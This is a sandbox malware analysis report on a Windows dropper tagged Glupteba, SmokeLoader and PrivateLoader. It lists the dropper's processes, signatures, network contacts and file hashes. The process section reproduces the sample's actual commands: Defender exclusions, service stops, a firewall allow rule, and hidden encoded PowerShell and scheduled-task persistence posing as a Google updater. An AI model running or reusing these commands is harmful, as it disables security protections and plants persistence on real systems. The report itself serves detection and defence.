Malware Analysis Report

2025-08-10 12:20

Sample ID 231121-2s5mpahg6y
Target allnewumm.exe
SHA256 fae531687cc458d8d7e504b81776514eec3cd9700891a1b873afa3748c84cc78
Tags
glupteba smokeloader up3 backdoor discordurls dropper evasion loader trojan upx privateloader spyware stealer themida
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK
  Enterprise Matrix V15

Analysis: static1
  Detonation Overview
  Signatures

Analysis: behavioral1
  Detonation Overview
  Command Line
  Signatures
  Processes
  Network
  Files

Analysis: behavioral2
  Detonation Overview
  Command Line
  Signatures
  Processes
  Network
  Files

Analysis Overview

score
10/10

SHA256

fae531687cc458d8d7e504b81776514eec3cd9700891a1b873afa3748c84cc78

Threat Level: Known bad

The file allnewumm.exe was found to be: Known bad.

Malicious Activity Summary

Glupteba payload

Suspicious use of NtCreateUserProcessOtherParentProcess

Glupteba

PrivateLoader

UAC bypass

SmokeLoader

Windows security bypass

Detected executables Discord URL observed in first stage droppers

Identifies VirtualBox via ACPI registry values (likely anti-VM)

Downloads MZ/PE file

Modifies Windows Firewall

Stops running service(s)

Checks computer location settings

Checks BIOS information in registry

Drops startup file

Reads user/profile data of web browsers

Loads dropped DLL

Themida packer

Executes dropped EXE

UPX packed file

Windows security modification

Checks whether UAC is enabled

Legitimate hosting services abused for malware hosting/C2

Enumerates connected drives

Looks up external IP address via web service

Drops file in System32 directory

Suspicious use of NtSetInformationThreadHideFromDebugger

Suspicious use of SetThreadContext

Launches sc.exe

Enumerates physical storage devices

Unsigned PE

Program crash

Suspicious behavior: MapViewOfSection

Checks SCSI registry key(s)

Suspicious behavior: EnumeratesProcesses

Suspicious use of AdjustPrivilegeToken

Suspicious use of FindShellTrayWindow

Delays execution with timeout.exe

Creates scheduled task(s)

Enumerates system info in registry

Suspicious use of WriteProcessMemory

Suspicious use of SetWindowsHookEx

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported 2023-11-21 22:51

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted 2023-11-21 22:51
Reported 2023-11-21 22:54
Platform win7-20231020-en
Max time kernel 8s
Max time network 149s

Command Line

"C:\Users\Admin\AppData\Local\Temp\allnewumm.exe"

Signatures

Glupteba

loader dropper glupteba

Glupteba payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

SmokeLoader

trojan backdoor smokeloader

Windows security bypass

evasion trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths C:\Users\Admin\AppData\Local\Temp\Random.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\Random.exe = "0" C:\Users\Admin\AppData\Local\Temp\Random.exe N/A

Detected executables Discord URL observed in first stage droppers

discordurls
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Modifies Windows Firewall

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\netsh.exe N/A

Stops running service(s)

evasion

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Windows security modification

evasion trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths C:\Users\Admin\AppData\Local\Temp\Random.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions C:\Users\Admin\AppData\Local\Temp\Random.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\Random.exe = "0" C:\Users\Admin\AppData\Local\Temp\Random.exe N/A

Legitimate hosting services abused for malware hosting/C2

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 2856 set thread context of 1716 N/A C:\Users\Admin\AppData\Local\Temp\toolspub2.exe C:\Users\Admin\AppData\Local\Temp\toolspub2.exe

Enumerates physical storage devices

Checks SCSI registry key(s)

Description Indicator Process Target
Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\toolspub2.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\toolspub2.exe N/A
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\toolspub2.exe N/A

Creates scheduled task(s)

persistence
Description Indicator Process Target
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A

Delays execution with timeout.exe

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\timeout.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\toolspub2.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\toolspub2.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2508 wrote to memory of 2696 N/A C:\Users\Admin\AppData\Local\Temp\allnewumm.exe C:\Users\Admin\AppData\Local\Temp\InstallSetup5.exe
PID 2508 wrote to memory of 2696 N/A C:\Users\Admin\AppData\Local\Temp\allnewumm.exe C:\Users\Admin\AppData\Local\Temp\InstallSetup5.exe
PID 2508 wrote to memory of 2696 N/A C:\Users\Admin\AppData\Local\Temp\allnewumm.exe C:\Users\Admin\AppData\Local\Temp\InstallSetup5.exe
PID 2508 wrote to memory of 2696 N/A C:\Users\Admin\AppData\Local\Temp\allnewumm.exe C:\Users\Admin\AppData\Local\Temp\InstallSetup5.exe
PID 2508 wrote to memory of 2696 N/A C:\Users\Admin\AppData\Local\Temp\allnewumm.exe C:\Users\Admin\AppData\Local\Temp\InstallSetup5.exe
PID 2508 wrote to memory of 2696 N/A C:\Users\Admin\AppData\Local\Temp\allnewumm.exe C:\Users\Admin\AppData\Local\Temp\InstallSetup5.exe
PID 2508 wrote to memory of 2696 N/A C:\Users\Admin\AppData\Local\Temp\allnewumm.exe C:\Users\Admin\AppData\Local\Temp\InstallSetup5.exe
PID 2508 wrote to memory of 2856 N/A C:\Users\Admin\AppData\Local\Temp\allnewumm.exe C:\Users\Admin\AppData\Local\Temp\toolspub2.exe
PID 2508 wrote to memory of 2856 N/A C:\Users\Admin\AppData\Local\Temp\allnewumm.exe C:\Users\Admin\AppData\Local\Temp\toolspub2.exe
PID 2508 wrote to memory of 2856 N/A C:\Users\Admin\AppData\Local\Temp\allnewumm.exe C:\Users\Admin\AppData\Local\Temp\toolspub2.exe
PID 2508 wrote to memory of 2856 N/A C:\Users\Admin\AppData\Local\Temp\allnewumm.exe C:\Users\Admin\AppData\Local\Temp\toolspub2.exe
PID 2508 wrote to memory of 2788 N/A C:\Users\Admin\AppData\Local\Temp\allnewumm.exe C:\Users\Admin\AppData\Local\Temp\e0cbefcb1af40c7d4aff4aca26621a98.exe
PID 2508 wrote to memory of 2788 N/A C:\Users\Admin\AppData\Local\Temp\allnewumm.exe C:\Users\Admin\AppData\Local\Temp\e0cbefcb1af40c7d4aff4aca26621a98.exe
PID 2508 wrote to memory of 2788 N/A C:\Users\Admin\AppData\Local\Temp\allnewumm.exe C:\Users\Admin\AppData\Local\Temp\e0cbefcb1af40c7d4aff4aca26621a98.exe
PID 2508 wrote to memory of 2788 N/A C:\Users\Admin\AppData\Local\Temp\allnewumm.exe C:\Users\Admin\AppData\Local\Temp\e0cbefcb1af40c7d4aff4aca26621a98.exe
PID 2508 wrote to memory of 2864 N/A C:\Users\Admin\AppData\Local\Temp\allnewumm.exe C:\Users\Admin\AppData\Local\Temp\Random.exe
PID 2508 wrote to memory of 2864 N/A C:\Users\Admin\AppData\Local\Temp\allnewumm.exe C:\Users\Admin\AppData\Local\Temp\Random.exe
PID 2508 wrote to memory of 2864 N/A C:\Users\Admin\AppData\Local\Temp\allnewumm.exe C:\Users\Admin\AppData\Local\Temp\Random.exe
PID 2508 wrote to memory of 2864 N/A C:\Users\Admin\AppData\Local\Temp\allnewumm.exe C:\Users\Admin\AppData\Local\Temp\Random.exe
PID 2696 wrote to memory of 2576 N/A C:\Users\Admin\AppData\Local\Temp\InstallSetup5.exe C:\Users\Admin\AppData\Local\Temp\Broom.exe
PID 2696 wrote to memory of 2576 N/A C:\Users\Admin\AppData\Local\Temp\InstallSetup5.exe C:\Users\Admin\AppData\Local\Temp\Broom.exe
PID 2696 wrote to memory of 2576 N/A C:\Users\Admin\AppData\Local\Temp\InstallSetup5.exe C:\Users\Admin\AppData\Local\Temp\Broom.exe
PID 2696 wrote to memory of 2576 N/A C:\Users\Admin\AppData\Local\Temp\InstallSetup5.exe C:\Users\Admin\AppData\Local\Temp\Broom.exe
PID 2508 wrote to memory of 2660 N/A C:\Users\Admin\AppData\Local\Temp\allnewumm.exe C:\Users\Admin\AppData\Local\Temp\latestX.exe
PID 2508 wrote to memory of 2660 N/A C:\Users\Admin\AppData\Local\Temp\allnewumm.exe C:\Users\Admin\AppData\Local\Temp\latestX.exe
PID 2508 wrote to memory of 2660 N/A C:\Users\Admin\AppData\Local\Temp\allnewumm.exe C:\Users\Admin\AppData\Local\Temp\latestX.exe
PID 2508 wrote to memory of 2660 N/A C:\Users\Admin\AppData\Local\Temp\allnewumm.exe C:\Users\Admin\AppData\Local\Temp\latestX.exe
PID 2856 wrote to memory of 1716 N/A C:\Users\Admin\AppData\Local\Temp\toolspub2.exe C:\Users\Admin\AppData\Local\Temp\toolspub2.exe
PID 2856 wrote to memory of 1716 N/A C:\Users\Admin\AppData\Local\Temp\toolspub2.exe C:\Users\Admin\AppData\Local\Temp\toolspub2.exe
PID 2856 wrote to memory of 1716 N/A C:\Users\Admin\AppData\Local\Temp\toolspub2.exe C:\Users\Admin\AppData\Local\Temp\toolspub2.exe
PID 2856 wrote to memory of 1716 N/A C:\Users\Admin\AppData\Local\Temp\toolspub2.exe C:\Users\Admin\AppData\Local\Temp\toolspub2.exe
PID 2856 wrote to memory of 1716 N/A C:\Users\Admin\AppData\Local\Temp\toolspub2.exe C:\Users\Admin\AppData\Local\Temp\toolspub2.exe
PID 2856 wrote to memory of 1716 N/A C:\Users\Admin\AppData\Local\Temp\toolspub2.exe C:\Users\Admin\AppData\Local\Temp\toolspub2.exe
PID 2856 wrote to memory of 1716 N/A C:\Users\Admin\AppData\Local\Temp\toolspub2.exe C:\Users\Admin\AppData\Local\Temp\toolspub2.exe

Processes

C:\Users\Admin\AppData\Local\Temp\allnewumm.exe

"C:\Users\Admin\AppData\Local\Temp\allnewumm.exe"

C:\Users\Admin\AppData\Local\Temp\InstallSetup5.exe

"C:\Users\Admin\AppData\Local\Temp\InstallSetup5.exe"

C:\Users\Admin\AppData\Local\Temp\toolspub2.exe

"C:\Users\Admin\AppData\Local\Temp\toolspub2.exe"

C:\Users\Admin\AppData\Local\Temp\e0cbefcb1af40c7d4aff4aca26621a98.exe

"C:\Users\Admin\AppData\Local\Temp\e0cbefcb1af40c7d4aff4aca26621a98.exe"

C:\Users\Admin\AppData\Local\Temp\Random.exe

"C:\Users\Admin\AppData\Local\Temp\Random.exe"

C:\Users\Admin\AppData\Local\Temp\Broom.exe

C:\Users\Admin\AppData\Local\Temp\Broom.exe

C:\Users\Admin\AppData\Local\Temp\latestX.exe

"C:\Users\Admin\AppData\Local\Temp\latestX.exe"

C:\Users\Admin\AppData\Local\Temp\toolspub2.exe

"C:\Users\Admin\AppData\Local\Temp\toolspub2.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\Random.exe" -Force

C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"

C:\Windows\system32\makecab.exe

"C:\Windows\system32\makecab.exe" C:\Windows\Logs\CBS\CbsPersist_20231121225237.log C:\Windows\Logs\CBS\CbsPersist_20231121225237.cab

C:\Users\Admin\AppData\Local\Temp\e0cbefcb1af40c7d4aff4aca26621a98.exe

"C:\Users\Admin\AppData\Local\Temp\e0cbefcb1af40c7d4aff4aca26621a98.exe"

C:\Users\Admin\Pictures\GOW6ZNpnNph28izNSxaj42Zj.exe

"C:\Users\Admin\Pictures\GOW6ZNpnNph28izNSxaj42Zj.exe"

C:\Users\Admin\Pictures\y21BWXLSetSymUVPYoQhMk6V.exe

"C:\Users\Admin\Pictures\y21BWXLSetSymUVPYoQhMk6V.exe"

C:\Users\Admin\Pictures\oTYnKcA5mm9jshIDchCMeOvK.exe

"C:\Users\Admin\Pictures\oTYnKcA5mm9jshIDchCMeOvK.exe" --silent --allusers=0

C:\Users\Admin\Pictures\sFYOXjNaiPEQT9okLFbO5h2O.exe

"C:\Users\Admin\Pictures\sFYOXjNaiPEQT9okLFbO5h2O.exe"

C:\Users\Admin\Pictures\5zTlIFqXp0wXeIB3IUBzLjf8.exe

"C:\Users\Admin\Pictures\5zTlIFqXp0wXeIB3IUBzLjf8.exe"

C:\Users\Admin\Pictures\ILfOFWfAGxFuXVJ2FTV1JfDh.exe

"C:\Users\Admin\Pictures\ILfOFWfAGxFuXVJ2FTV1JfDh.exe"

C:\Users\Admin\AppData\Local\Temp\7zSA60F.tmp\Install.exe

.\Install.exe

C:\Users\Admin\AppData\Local\Temp\7zSAA53.tmp\Install.exe

.\Install.exe /IuCdidQXCBm "385118" /S

C:\Windows\SysWOW64\forfiles.exe

"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"

C:\Windows\SysWOW64\forfiles.exe

"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"

C:\Windows\SysWOW64\cmd.exe

/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&

\??\c:\windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32

C:\Windows\SysWOW64\cmd.exe

/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&

\??\c:\windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32

\??\c:\windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64

\??\c:\windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "gXngEgmba" /SC once /ST 07:13:01 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="

C:\Windows\SysWOW64\schtasks.exe

schtasks /run /I /tn "gXngEgmba"

C:\Windows\system32\taskeng.exe

taskeng.exe {5F464B45-1C3E-4674-89FA-E7D49161E213} S-1-5-21-1154728922-3261336865-3456416385-1000:TLIDUQCQ\Admin:Interactive:[1]

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==

C:\Users\Admin\Pictures\ILfOFWfAGxFuXVJ2FTV1JfDh.exe

"C:\Users\Admin\Pictures\ILfOFWfAGxFuXVJ2FTV1JfDh.exe"

C:\Windows\system32\gpupdate.exe

"C:\Windows\system32\gpupdate.exe" /force

C:\Windows\system32\gpscript.exe

gpscript.exe /RefreshSystemParam

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc

C:\Windows\System32\sc.exe

sc stop UsoSvc

C:\Windows\System32\sc.exe

sc stop wuauserv

C:\Windows\System32\sc.exe

sc stop bits

C:\Windows\System32\sc.exe

sc stop dosvc

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#nvjdnn#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-dc 0

C:\Windows\System32\sc.exe

sc stop WaaSMedicSvc

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-dc 0

C:\Windows\system32\schtasks.exe

"C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /ru System /tn GoogleUpdateTaskMachineQC /tr "'C:\Program Files\Google\Chrome\updater.exe'"

C:\Windows\system32\taskeng.exe

taskeng.exe {148EF647-0594-4E96-9E7E-28F5180B30FC} S-1-5-18:NT AUTHORITY\System:Service:

C:\Windows\System32\schtasks.exe

C:\Windows\System32\schtasks.exe /run /tn "GoogleUpdateTaskMachineQC"

C:\Program Files\Google\Chrome\updater.exe

"C:\Program Files\Google\Chrome\updater.exe"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /c start "" "C:\ProgramData\DBFHDHJKKJ.exe"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /c timeout /t 5 & del /f /q "C:\Users\Admin\Pictures\sFYOXjNaiPEQT9okLFbO5h2O.exe" & del "C:\ProgramData\*.dll"" & exit

C:\Windows\SysWOW64\timeout.exe

timeout /t 5

C:\Windows\SysWOW64\schtasks.exe

schtasks /DELETE /F /TN "gXngEgmba"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc

C:\Windows\System32\sc.exe

sc stop UsoSvc

C:\Windows\System32\sc.exe

sc stop WaaSMedicSvc

C:\Windows\System32\sc.exe

sc stop wuauserv

C:\Windows\System32\sc.exe

sc stop bits

C:\Windows\System32\sc.exe

sc stop dosvc

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#nvjdnn#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-ac 0

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-dc 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-dc 0

C:\Windows\system32\schtasks.exe

"C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /ru System /tn GoogleUpdateTaskMachineQC /tr "'C:\Program Files\Google\Chrome\updater.exe'"

C:\Windows\System32\conhost.exe

C:\Windows\System32\conhost.exe

C:\Users\Admin\Pictures\GOW6ZNpnNph28izNSxaj42Zj.exe

"C:\Users\Admin\Pictures\GOW6ZNpnNph28izNSxaj42Zj.exe"

C:\Windows\system32\cmd.exe

C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /c start "" "C:\ProgramData\FHCGCAAKJD.exe"

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "bSTfouYtWkypYZNMeg" /SC once /ST 22:55:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\HMvTITvwCIIOPWHKa\dvQXzghxGoSBWXp\MleYOBj.exe\" rd /ctsite_idMSp 385118 /S" /V1 /F

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /c timeout /t 5 & del /f /q "C:\Users\Admin\Pictures\5zTlIFqXp0wXeIB3IUBzLjf8.exe" & del "C:\ProgramData\*.dll"" & exit

C:\Windows\system32\netsh.exe

netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes

C:\Windows\explorer.exe

C:\Windows\explorer.exe

Network

Country Destination Domain Proto
US 8.8.8.8:53 pastebin.com udp
US 8.8.8.8:53 yip.su udp
US 104.20.67.143:443 pastebin.com tcp
US 188.114.96.0:443 yip.su tcp
US 8.8.8.8:53 gobo23cl.top udp
US 8.8.8.8:53 julimichkids.online udp
US 8.8.8.8:53 flyawayaero.net udp
US 8.8.8.8:53 gobo24cl.top udp
MY 111.90.146.230:80 tcp
US 8.8.8.8:53 redirector.pm udp
US 8.8.8.8:53 lycheepanel.info udp
US 8.8.8.8:53 rawcracker.com udp
US 8.8.8.8:53 net.geo.opera.com udp
US 194.49.94.67:80 tcp
DE 88.198.22.18:443 julimichkids.online tcp
US 172.67.215.14:80 gobo23cl.top tcp
US 104.21.93.225:443 flyawayaero.net tcp
US 188.114.97.0:80 rawcracker.com tcp
US 188.114.97.0:443 rawcracker.com tcp
US 194.49.94.85:443 redirector.pm tcp
US 104.21.32.208:443 lycheepanel.info tcp
NL 185.26.182.112:80 net.geo.opera.com tcp
NL 185.26.182.112:443 net.geo.opera.com tcp
US 172.67.215.14:443 gobo23cl.top tcp
US 188.114.97.0:443 rawcracker.com tcp
US 8.8.8.8:53 apps.identrust.com udp
US 8.8.8.8:53 bobkelsofan.com udp
US 8.8.8.8:53 potatogoose.com udp
US 172.67.169.68:443 bobkelsofan.com tcp
NL 88.221.25.153:80 apps.identrust.com tcp
US 104.21.35.235:443 potatogoose.com tcp
US 8.8.8.8:53 t.me udp
NL 149.154.167.99:443 t.me tcp
NL 149.154.167.99:443 t.me tcp
NL 149.154.167.99:443 t.me tcp
NL 149.154.167.99:443 t.me tcp
US 8.8.8.8:53 steamcommunity.com udp
NL 23.222.49.98:443 steamcommunity.com tcp
DE 49.13.94.153:443 tcp
DE 49.13.94.153:443 tcp
DE 49.13.94.153:443 tcp
DE 49.13.94.153:443 tcp
US 8.8.8.8:53 host-file-host6.com udp
US 8.8.8.8:53 host-host-file8.com udp
US 95.214.26.28:80 host-host-file8.com tcp
DE 49.13.94.153:443 tcp
DE 49.13.94.153:443 tcp
DE 49.13.94.153:443 tcp
US 8.8.8.8:53 t.me udp
NL 149.154.167.99:443 t.me tcp
NL 149.154.167.99:443 t.me tcp
NL 149.154.167.99:443 t.me tcp
NL 149.154.167.99:443 t.me tcp
US 8.8.8.8:53 steamcommunity.com udp
NL 23.222.49.98:443 steamcommunity.com tcp
DE 49.13.94.153:443 tcp
DE 49.13.94.153:443 tcp
US 8.8.8.8:53 www.microsoft.com udp
DE 49.13.94.153:443 tcp
DE 49.13.94.153:443 tcp
DE 49.13.94.153:443 tcp
DE 49.13.94.153:443 tcp
DE 49.13.94.153:443 tcp
US 8.8.8.8:53 xmr-eu1.nanopool.org udp
US 8.8.8.8:53 pastebin.com udp
US 104.20.67.143:443 pastebin.com tcp
FR 51.15.193.130:14433 xmr-eu1.nanopool.org tcp

Files

memory/2508-0-0x0000000074730000-0x0000000074E1E000-memory.dmp

memory/2508-1-0x0000000000C60000-0x0000000001B40000-memory.dmp

\Users\Admin\AppData\Local\Temp\InstallSetup5.exe

MD5 cba9c1d1fcbf999d9ccb04050c5c5154
SHA1 554e436c9c3f1f16c9a9b7ab74dd4cd191118481
SHA256 c3ab7948969593528e883956dc2cb0a754a4832076bc2e9b6c4f1c7ce2002842
SHA512 c7d8be36705e08fcd8a7ed8a319aac2aa1d26397081a75511408d51871daa05e21c89be7428eda8a5f7f757ba0c0e74e710e8515b26c89c19b8d7f480a1c0a0b

C:\Users\Admin\AppData\Local\Temp\InstallSetup5.exe

MD5 cba9c1d1fcbf999d9ccb04050c5c5154
SHA1 554e436c9c3f1f16c9a9b7ab74dd4cd191118481
SHA256 c3ab7948969593528e883956dc2cb0a754a4832076bc2e9b6c4f1c7ce2002842
SHA512 c7d8be36705e08fcd8a7ed8a319aac2aa1d26397081a75511408d51871daa05e21c89be7428eda8a5f7f757ba0c0e74e710e8515b26c89c19b8d7f480a1c0a0b

\Users\Admin\AppData\Local\Temp\toolspub2.exe

MD5 8ef35a51d9b58606554128b7556ceac2
SHA1 7db9caaa38f1d8bbf36c200e8f721e8e2569cf30
SHA256 b193ce6afc9a17e3e56c5a6944db038c0c88fb25e551acc551dd2a019786590e
SHA512 92be8d6f87d89d762ee25a8546eedc1e0fdce6f25685b59070555b2587e3f011712ebe725326b57cbaeb041dcc2551672342d1830d6b2df05c8183696d21df24

\Users\Admin\AppData\Local\Temp\toolspub2.exe

MD5 8ef35a51d9b58606554128b7556ceac2
SHA1 7db9caaa38f1d8bbf36c200e8f721e8e2569cf30
SHA256 b193ce6afc9a17e3e56c5a6944db038c0c88fb25e551acc551dd2a019786590e
SHA512 92be8d6f87d89d762ee25a8546eedc1e0fdce6f25685b59070555b2587e3f011712ebe725326b57cbaeb041dcc2551672342d1830d6b2df05c8183696d21df24

C:\Users\Admin\AppData\Local\Temp\toolspub2.exe

MD5 8ef35a51d9b58606554128b7556ceac2
